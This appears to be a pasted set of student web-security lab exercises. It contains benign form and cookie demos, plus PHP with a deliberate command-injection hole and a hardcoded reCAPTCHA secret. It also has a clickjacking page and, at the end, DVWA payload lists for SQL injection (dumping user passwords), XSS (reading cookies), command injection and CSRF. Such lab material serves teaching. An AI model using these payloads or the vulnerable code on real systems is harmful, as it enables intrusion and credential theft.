Advertisement
war99859

Untitled

Oct 29th, 2023 (edited)
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 10.15 KB | None | 0 0
  1. Experiments:
  2. <!DOCTYPE html>
  3. <html>
  4. <head>
  5.     <script src="https://www.google.com/recaptcha/api.js"></script>
  6. </head>
  7. <body>
  8.     <form action="submit.php">
  9.         <input type="text" name="u" placeholder="Username" required>
  10.         <input type="password" name="p" placeholder="Password" required>
  11.         <input type="hidden" name="h1" value="v1">
  12.         <div class="g-recaptcha" data-sitekey="YOUR_KEY"></div>
  13.         <input type="submit">
  14.     </form>
  15. </body>
  16. </html>
  17.  
  18. Exp_1:
  19. Index.html:
  20. <!DOCTYPE html>
  21. <html>
  22. <head>
  23. <title>Exp_1</title>
  24. </head>
  25. <body>
  26. <center>
  27. <h1>Amrita Cyber Nation</h1>
  28. <form action="process-login.php" method="post">
  29. <label>Username:</label>
  30. <input type="text" required><br><br>
  31.  
  32. <input type="hidden" name="registration_type" value="Hidden">
  33. <label>Password:</label>
  34. <input type="password" required><br><br>
  35. <div class="g-recaptcha"
  36. data-sitekey="6Lfdq9ooAAAAAPnQmjE95iUwPlUcCIbgnfW_P81x"></div><br>
  37. <input type="submit" value="Login">
  38. </form>
  39. </center>
  40. <!-- reCAPTCHA script -->
  41. <script src="https://www.google.com/recaptcha/api.js" async defer></script>
  42. </body>
  43. </html>
  44.  
  45. Process-login.php:
  46. <?php
  47. //secret-key
  48. $secretKey = "6Lfdq9ooAAAAACb8KNJnZeV1uy4zJuSoFEwcVniT";
  49. if (!isset($_POST['g-recaptcha-response']) || empty($_POST['g-recaptcha-response'])) { exit("Captcha verification failed.");}
  50.  
  51. //api-keyaddress
  52. $response = file_get_contents("https://www.google.com/recaptcha/api/siteverify?secret=$secretKey&respons e={$_POST['g-recaptcha-response']}");
  53. $isVerified = json_decode($response, true)["success"];
  54. echo $isVerified ? "Login successful!": "Please complete the captcha verification.";
  55. ?>
  56.  
  57. Exp_2:
  58.  
  59. index.html:
  60. <!DOCTYPE html>
  61. <html>
  62. <head>
  63. <title>Registration</title>
  64. </head>
  65. <body>
  66. <h1>Amrita Cyber Nation Registration</h1>
  67. <form autocomplete="off">
  68. <input type="text" name="username" placeholder="Username" autocomplete="off"><br>
  69. <input type="email" name="email" placeholder="Email" autocomplete="off"><br>
  70. <input type="password" name="password" placeholder="Password" autocomplete="off"><br>
  71. <input type="submit" value="Register">
  72. </form>
  73. </body>
  74. </html>
  75.  
  76. Exp_3:
  77. Index.html:
  78. <html>
  79. <head>
  80. <title>exp_3_Bank Login</title>
  81. </head>
  82. <body>
  83. <h1>Bank Login</h1>
  84. <form id="bankLoginForm">
  85. <input type="text" placeholder="Username"><br>
  86. <input type="password" placeholder="Password"><br>
  87. <input type="button" value="Login" onclick="openBankPortal()">
  88. </form>
  89.  
  90. <script>
  91. function openBankPortal() { window.open('bank-portal.html', 'BankPortal',
  92. 'width=600,height=400,location=no,menubar=no,status=no,toolbar=no');
  93. }
  94. </script>
  95. </body>
  96. </html>
  97.  
  98. Bank-portal.html:
  99. <html>
  100. <head>
  101. </head>
  102. <body>
  103. <div class="container">
  104. <h2>Welcome to the Bank Portal</h2>
  105. <p>Your current balance is: $10,000</p>
  106. </div>
  107. </body>
  108. </html>
  109.  
  110.  
  111. Exp_4:
  112. index.html
  113. <html>
  114. <head>
  115. <title>Exp_4</title>
  116. <script>
  117. function preventActions(e) { e.preventDefault();
  118. alert('Copy, Paste, and Right Click are not allowed.');
  119. }
  120. </script>
  121. </head>
  122.  
  123. <body oncontextmenu="preventActions(event)">
  124. <center>
  125. <h1>Bank Tranfer</h1>
  126. <form>
  127. <label for="fromAccount">From Account:</label>
  128. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  129. <label for="toAccount">To Account:</label>
  130. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  131. <label for="amount">Amount:</label>
  132. <input type="text" oncopy="preventActions(event)" onpaste="preventActions(event)"><br><br>
  133. <input type="submit" value="Transfer">
  134. </form>
  135. </center>
  136. </body>
  137. </html>
  138.  
  139. Exp_5:
  140. Index.html:
  141. <html>
  142. <head>
  143. <script>
  144. function validateLocation() { navigator.geolocation.getCurrentPosition(position => {
  145.  
  146. fetch(`https://api.bigdatacloud.net/data/reverse-geocode-client?latitude=${position.coords.latitud e}&longitude=${position.coords.longitude}`)
  147. .then(res => res.json())
  148. .then(data => alert(data.countryName === document.getElementById('country').value ? 'Success' : 'Incorrect'));});
  149. }
  150. </script>
  151. </head>
  152.  
  153. <body>
  154. <h1>Country Validation</h1>
  155. <form onsubmit="event.preventDefault(); validateLocation();">
  156. <label>Country:</label>
  157. <select id="country">
  158. <option value="India">India</option>
  159. <option value="USA">USA</option>
  160. <option value="Japan">Japan</option>
  161. </select>
  162. <input type="submit" value="Verify">
  163. </form>
  164. </body>
  165. </html>
  166.  
  167. Exp_6:
  168. Index.html:
  169. <!DOCTYPE html>
  170. <html>
  171. <head>
  172.     <title>Banking Sign-In</title>
  173. </head>
  174. <body>
  175.     <form method="POST" action="">
  176.         <label for="username">Username</label><br>
  177.         <input type="text" name="username" id="username"><br>
  178.         <label for="email">Email</label><br>
  179.         <input type="email" name="email" id="email"><br>
  180.         <button type="submit">Register</button>
  181.     </form>
  182.  
  183.     <?php
  184.    if ($_SERVER["REQUEST_METHOD"] == "POST") {
  185.        echo "<h2>VERIFICATION PURPOSE</h2>";
  186.         $username = $_POST['username'];
  187.         $email = $_POST['email'];
  188.         echo "Username: $username <br>";
  189.         echo "Email: $email";
  190.     }
  191.     ?>
  192. </body>
  193. </html>
  194.  
  195.  
  196. Exp_7:
  197.  
  198. Exp_8:
  199. Index.html:
  200. <html>
  201. <head>
  202. <script>
  203. function fetchMarks() {
  204. const name = document.getElementById('students').value; const xhttp = new XMLHttpRequest();
  205. xhttp.onload = function() {
  206. const student = Array.from(this.responseXML.querySelectorAll('student')).find(s => s.querySelector('name').textContent === name);
  207. if (student) {
  208. const maths = student.querySelector('maths').textContent; const science = student.querySelector('science').textContent; const history = student.querySelector('history').textContent;
  209.  
  210. document.getElementById('output').innerHTML = `Maths: ${maths}<br>Science:
  211. ${science}<br>History: ${history}`;
  212. }
  213. };
  214. xhttp.open("GET", "students.xml"); xhttp.send();
  215. }
  216. </script>
  217. </head>
  218.  
  219. <body>
  220. <h1>Display Student Marks</h1>
  221. <select id="students">
  222. <option>John Doe</option>
  223. <option>Jane Smith</option>
  224. </select>
  225.  
  226. <button onclick="fetchMarks()">Display Marks</button>
  227. <div id="output"></div>
  228. </body>
  229. </html>
  230.  
  231. Students.xml:
  232. <?xml version="1.0" encoding="UTF-8"?>
  233. <students>
  234. <student>
  235. <name>John Doe</name>
  236. <maths>85</maths>
  237. <science>88</science>
  238. <history>90</history>
  239. </student>
  240. <student>
  241. <name>Jane Smith</name>
  242. <maths>78</maths>
  243. <science>82</science>
  244. <history>86</history>
  245. </student>
  246. </students>
  247.  
  248. Exp_9: Index.html:
  249. <html>
  250. <head>
  251. <script>
  252.  
  253. function displayDetails() { fetch('students.json')
  254. .then(response => response.json())
  255. .then(data => { const details = `
  256. Name: ${data.name}<br> Age: ${data.age}<br> Grade: ${data.grade}
  257. `;
  258. document.getElementById('studentDetails').innerHTML = details;
  259. });
  260. }
  261. </script>
  262. </head>
  263. <body>
  264. <h1>Fetch From Json</h1><br>
  265. <button onclick="displayDetails()">Display Student Details</button><br><br>
  266. <div id="studentDetails"></div>
  267.  
  268. </body>
  269. </html>
  270.  
  271. Students.json:
  272. {
  273. "name": "John Doe", "age": 21,
  274. "grade": "B"
  275. }
  276.  
  277. Exp_10:
  278. Cookie.php
  279. <?php if(isset($_GET['action'])) {
  280. switch ($_GET['action']) { case 'set':
  281. setcookie("user", "John Doe", time() + 3600); echo "Cookie set!<br>";
  282. break;
  283.  
  284. case 'get':
  285. echo isset($_COOKIE["user"]) ? "Cookie: " . $_COOKIE["user"] . "<br>" : "Cookie not set.<br>";
  286. break;
  287.  
  288. case 'modify':
  289. setcookie("user", "Jane Smith", time() + 3600); echo "Cookie modified!<br>";
  290. break;
  291.  
  292. case 'delete':
  293. setcookie("user", "", time() - 3600); echo "Cookie deleted!<br>"; break;
  294. }
  295. }
  296. ?>
  297. <h1>working with cookies</h1>
  298. <a href="?action=set">Set Cookie</a> |
  299. <a href="?action=get">Get Cookie</a> |
  300. <a href="?action=modify">Modify Cookie</a> |
  301. <a href="?action=delete">Delete Cookie</a>
  302.  
  303. Exp_14:
  304. <?php
  305. if (isset($_GET['ip'])) {
  306. system("ping " . $_GET['ip']);
  307. }
  308. ?>
  309.  
  310. <form method="GET">
  311. Enter the IP to perform ping: <input type="text" name="ip">
  312. <input type="submit" value="View File">
  313. </form>
  314.  
  315. Exp_15: Index.html
  316. <html>
  317. <head>
  318. <style>
  319. body {
  320. display: flex;
  321. justify-content: center; align-items: center; height: 100vh; position: relative;
  322. }
  323.  
  324. iframe {
  325. position: absolute; top: 50%;
  326. left: 50%;
  327. transform: translate(-50%, -50%);
  328. opacity: 0.1; /* Makes the iframe barely visible */ z-index: 2;
  329. }
  330. button {
  331. font-size: 24px; padding: 15px 30px; z-index: 1;
  332. }
  333. </style>
  334. </head>
  335. <body>
  336. <iframe src="target.html" width="200" height="100"></iframe>
  337. <button>Close the advertisement</button>
  338. </body>
  339. </html>
  340.  
  341. Target.html:
  342. <!DOCTYPE html>
  343. <html lang="en">
  344. <head>
  345. <meta charset="UTF-8">
  346. <title>Target Page</title>
  347. <style>
  348. body {
  349. display: flex;
  350. justify-content: center; align-items: center; height: 100vh;
  351. }
  352. button {
  353. font-size: 24px; padding: 15px 30px;
  354. }
  355. </style>
  356. </head>
  357. <body>
  358. <button onclick="alert('Data compromised')">HACK</button>
  359. </body>
  360. </html>
  361.  
  362.  
  363. 11. SQL
  364. a. Always True Scenario -
  365. %' or '1'='1
  366.  
  367. b. Display Database Version, User, Name -
  368. %' or 0=0 union select null, version() #
  369. %' or 0=0 union select null, user() #
  370. %' or 0=0 union select null, database() #
  371.  
  372. c. Display all the table field -
  373. 'union select null,table_name from information_schema.tables#
  374.  
  375. d. Display all the column's field -
  376.  'union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  377.  
  378.  
  379. 12. XSS
  380. a. Reflected XSS
  381. <script>alert(document.cookie)</script>
  382. <Script>alert(document.cookie)</Script>
  383. <img src = x onerror =alert(document.cookie)>
  384.  
  385. b. Stored XSS
  386. <script>alert(document.cookie)</script>
  387. <Script>alert(document.cookie)</Script>
  388. <svg/onload=alert("hackersid")>
  389.  
  390. c. DOM-based XSS
  391. <script>alert(document.cookie)</script>
  392. </select><img src=x onerror=alert('XSS')>
  393. & </select> <Svg onload=alert("hi")>
  394.  
  395. reflected xss
  396. low
  397. <script> alert("1567")</script>
  398. medium
  399. <Script> alert("1567")</Script>
  400. high
  401. <img src=x onerror=alert("12345")>
  402.  
  403. stored xss
  404. low
  405. <script> alert("1567")</script>
  406. medium
  407. <Script> alert("1567")</Script>
  408. high
  409. <svg/onload=alert("hackersid")>
  410.  
  411.  
  412. 14. Command Injuction
  413. 127.0.01 | tasklist
  414. 127.0.01 | wmic bios
  415. 127.0.01 | whoami
  416.  
  417.  
  418. 13. CSRF
  419. <form action="http://localhost:8080/dvwa/vulnerabilities/csrf/?" method="GET">
  420.             <h1> Click here to get 100Rs </h1>
  421.             <input type="hidden" AUTOCOMPLETE="off" name="password_new" value="7814">
  422.             <input type="hidden" AUTOCOMPLETE="off" name="password_conf" value="7814">
  423.             <input type="submit" value="Submit" name="Change">
  424.         </form>
  425.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement